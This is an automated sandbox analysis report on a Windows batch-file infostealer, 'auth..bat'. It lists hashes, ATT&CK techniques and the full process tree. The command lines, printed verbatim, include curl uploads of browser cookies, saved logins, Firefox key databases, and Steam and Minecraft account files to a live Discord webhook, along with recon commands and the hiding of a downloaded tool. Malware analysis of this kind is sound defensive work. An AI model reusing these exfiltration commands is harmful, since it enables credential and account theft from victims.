ffb7484dbd43f1a8de746604b64da32f8f408b8c76429cb8d36c0fe6c31d6438

Analysis

max time kernel
87s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
16-02-2024 20:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dependencies/2024-1-12/auth..bat
Size

6KB
MD5

8825cf897e698ebbdb8c707bb39d73ca
SHA1

dcece549ce6ed0b24ecc1faf80280c225bdcccae
SHA256

b332d0f81de5a8eced6109033f05192e2aa5ca3ed0a523367428813924a9a28d
SHA512

e3c63dda17128929108ff5492364b4d2df8126f2a8c17d7384ba9f7b0651aec72c11681dd7196f2eef7d693b9b3165b96fc05c98afc40fab9252ef2c7a26e3f9
SSDEEP

192:sYHAivgiRwe5f11ATNLCAtMT7/4+tGs1PP/uQz8tz1hNn:8i4iRwe5f11ATNLCAtMT7/4+tGs1PP/M

Score

8^/10

evasion spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 5084 powershell.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

788 attrib.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
8	5084	powershell.exe

pid	process
788	attrib.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 39 IoCs

Web Service

T1102

Processes:

flow	ioc
38	discord.com
47	discord.com
62	discord.com
72	discord.com
82	discord.com
88	discord.com
15	discord.com
44	discord.com
49	discord.com
77	discord.com
87	discord.com
90	discord.com
16	discord.com
52	discord.com
56	discord.com
58	discord.com
79	discord.com
81	discord.com
89	discord.com
92	discord.com
93	discord.com
53	discord.com
83	discord.com
46	discord.com
50	discord.com
54	discord.com
55	discord.com
61	discord.com
71	discord.com
73	discord.com
84	discord.com
85	discord.com
91	discord.com
22	discord.com
51	discord.com
78	discord.com
80	discord.com
57	discord.com
86	discord.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 api.ipify.org

flow	ioc
6	api.ipify.org

Delays execution with timeout.exe 10 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
4860	timeout.exe
3944	timeout.exe
1004	timeout.exe
2972	timeout.exe
2856	timeout.exe
2220	timeout.exe
560	timeout.exe
3196	timeout.exe
2420	timeout.exe
4004	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

4820 tasklist.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

4732 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

3992 systeminfo.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings powershell.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

688 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

632 PING.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1316 powershell.exe
1316 powershell.exe
5084 powershell.exe
5084 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exetasklist.exe

description pid process

Token: SeDebugPrivilege 1316 powershell.exe
Token: SeDebugPrivilege 5084 powershell.exe
Token: SeDebugPrivilege 4820 tasklist.exe

pid	process
4820	tasklist.exe

pid	process
4732	ipconfig.exe

pid	process
3992	systeminfo.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings	powershell.exe

pid	process
688	reg.exe

pid	process
632	PING.EXE

pid	process
1316	powershell.exe
1316	powershell.exe
5084	powershell.exe
5084	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	4820	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execmd.execmd.execmd.exenet.exe

description	pid	process	target process
PID 4508 wrote to memory of 1316	4508	cmd.exe	powershell.exe
PID 4508 wrote to memory of 1316	4508	cmd.exe	powershell.exe
PID 1316 wrote to memory of 5020	1316	powershell.exe	cmd.exe
PID 1316 wrote to memory of 5020	1316	powershell.exe	cmd.exe
PID 5020 wrote to memory of 1660	5020	cmd.exe	cmd.exe
PID 5020 wrote to memory of 1660	5020	cmd.exe	cmd.exe
PID 1660 wrote to memory of 632	1660	cmd.exe	PING.EXE
PID 1660 wrote to memory of 632	1660	cmd.exe	PING.EXE
PID 1660 wrote to memory of 724	1660	cmd.exe	findstr.exe
PID 1660 wrote to memory of 724	1660	cmd.exe	findstr.exe
PID 5020 wrote to memory of 636	5020	cmd.exe	cmd.exe
PID 5020 wrote to memory of 636	5020	cmd.exe	cmd.exe
PID 636 wrote to memory of 5084	636	cmd.exe	powershell.exe
PID 636 wrote to memory of 5084	636	cmd.exe	powershell.exe
PID 5020 wrote to memory of 4652	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 4652	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 64	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 64	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 2508	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 2508	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 788	5020	cmd.exe	attrib.exe
PID 5020 wrote to memory of 788	5020	cmd.exe	attrib.exe
PID 5020 wrote to memory of 2280	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 2280	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 3992	5020	cmd.exe	systeminfo.exe
PID 5020 wrote to memory of 3992	5020	cmd.exe	systeminfo.exe
PID 5020 wrote to memory of 4380	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 4380	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 4820	5020	cmd.exe	tasklist.exe
PID 5020 wrote to memory of 4820	5020	cmd.exe	tasklist.exe
PID 5020 wrote to memory of 1612	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 1612	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 2788	5020	cmd.exe	net.exe
PID 5020 wrote to memory of 2788	5020	cmd.exe	net.exe
PID 2788 wrote to memory of 2444	2788	net.exe	net1.exe
PID 2788 wrote to memory of 2444	2788	net.exe	net1.exe
PID 5020 wrote to memory of 3636	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 3636	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 688	5020	cmd.exe	reg.exe
PID 5020 wrote to memory of 688	5020	cmd.exe	reg.exe
PID 5020 wrote to memory of 3068	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 3068	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 4732	5020	cmd.exe	ipconfig.exe
PID 5020 wrote to memory of 4732	5020	cmd.exe	ipconfig.exe
PID 5020 wrote to memory of 752	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 752	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 3924	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 3924	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 220	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 220	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 1216	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 1216	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 2420	5020	cmd.exe	timeout.exe
PID 5020 wrote to memory of 2420	5020	cmd.exe	timeout.exe
PID 5020 wrote to memory of 4540	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 4540	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 4456	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 4456	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 1792	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 1792	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 4004	5020	cmd.exe	timeout.exe
PID 5020 wrote to memory of 4004	5020	cmd.exe	timeout.exe
PID 5020 wrote to memory of 4876	5020	cmd.exe	curl.exe
PID 5020 wrote to memory of 4876	5020	cmd.exe	curl.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

788 attrib.exe

pid	process
788	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dependencies\2024-1-12\auth..bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start -verb runas 'C:\Users\Admin\AppData\Local\Temp\dependencies\2024-1-12\auth..bat' am_admin
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dependencies\2024-1-12\auth..bat" am_admin
3⤵
- Suspicious use of WriteProcessMemory
PID:5020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL ping -4 -n 1 JQGVKGNK | findstr [
4⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\system32\findstr.exe
findstr [
5⤵
PID:724

C:\Windows\system32\PING.EXE
ping -4 -n 1 JQGVKGNK
5⤵
- Runs ping.exe
PID:632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
4⤵
- Suspicious use of WriteProcessMemory
PID:636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-RestMethod api.ipify.org
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5084

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[Report from Admin - 89.149.23.59]\nLocal time: 20:39```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4652

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Screenshot @ 20:39```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:64

C:\Windows\system32\curl.exe
curl --silent -L --fail "https://github.com/chuntaro/screenshot-cmd/blob/master/screenshot.exe?raw=true" -o s.exe
4⤵
PID:2508

C:\Windows\system32\attrib.exe
attrib "C:\ProgramData\s.exe" +h
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:788

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F ss=@"C:\ProgramData\s.png" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2280

C:\Windows\system32\systeminfo.exe
SystemInfo
4⤵
- Gathers system information
PID:3992

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F systeminfo=@"C:\Users\Admin\AppData\Roaming\sysinfo.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4380

C:\Windows\system32\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4820

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\tasklist.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1612

C:\Windows\system32\net.exe
net user
4⤵
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
5⤵
PID:2444

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\netuser.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3636

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
4⤵
- Modifies registry key
PID:688

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\stup.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3068

C:\Windows\system32\ipconfig.exe
ipconfig /all
4⤵
- Gathers network information
PID:4732

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\ipconfig.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:752

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3924

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:220

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1216

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:2420

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4540

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4456

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1792

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:4004

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4876

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:2972

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- OPERA -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1064

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Cookies" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3356

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\History" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:632

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:2856

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1080

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2948

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Login Data" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2344

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:2220

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- FIREFOX -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles"
4⤵
PID:3448

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\majlkcy4.Admin\logins.json" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:5084

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:4860

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\majlkcy4.Admin\key3.db" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2252

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\majlkcy4.Admin\key4.db" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3844

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\majlkcy4.Admin\cookies.sqlite" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2744

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:560

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qmjs2eet.default-release\logins.json" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:788

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:3196

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qmjs2eet.default-release\key3.db" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3876

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qmjs2eet.default-release\key4.db" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3760

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qmjs2eet.default-release\cookies.sqlite" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1400

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:3944

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- DISCORD -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discord\Local Storage\leveldb\"
4⤵
PID:1480

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- STEAM -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2484

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Program Files (x86)\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2800

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F loginusers=@"C:\Program Files\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files (x86)\Steam\"
4⤵
PID:4332

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MINECRAFT -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files\Steam\"
4⤵
PID:4304

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3836

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3276

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:1004

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Batch Scheduled: false\n[End of report]```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3920

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\s.exe
Filesize
107KB

MD5
dc2ebc528ee77d690473ed501b9e5b5b

SHA1
e921088e2c517e76c6d38b4147fd4794fb444b3c

SHA256
c40f47fb5ec716a97c5032dd762f1bb4469a3f7fd404da2ecbbc54b2be57595a

SHA512
f982e05e042d5c75b31f7823bd4ff1384588f270d5c568b5a8a4c84cf576f87bca1d0f31fc565e2a7745fc42d4a0749dc516cf6224b859f1da2e52ff5c9e13cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tljkvwu1.vox.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\ipconfig.txt
Filesize
1022B

MD5
21fd3e13a6b00188e0b6a21e15cbe753

SHA1
a9e8e2758a99135bc2a430fb98017d69d2540729

SHA256
d9eda70a847b61593077fd2c3a8c2ea30b00695449f08247c39a1a0d9a11f7a2

SHA512
5658677a85959c3310eb4c5d932ca72671cf141a2edf6ba1f75b2f55861076340ec7885d8a5aa1bf435f3d68409fce98b13769f52f7b3177fa4269532e1c368d

Download Submit
C:\Users\Admin\AppData\Roaming\netuser.txt
Filesize
283B

MD5
f82b6db42d2d2f88b123c702153bd250

SHA1
709ec36910626e4a6a655a93a14053dde465f7cb

SHA256
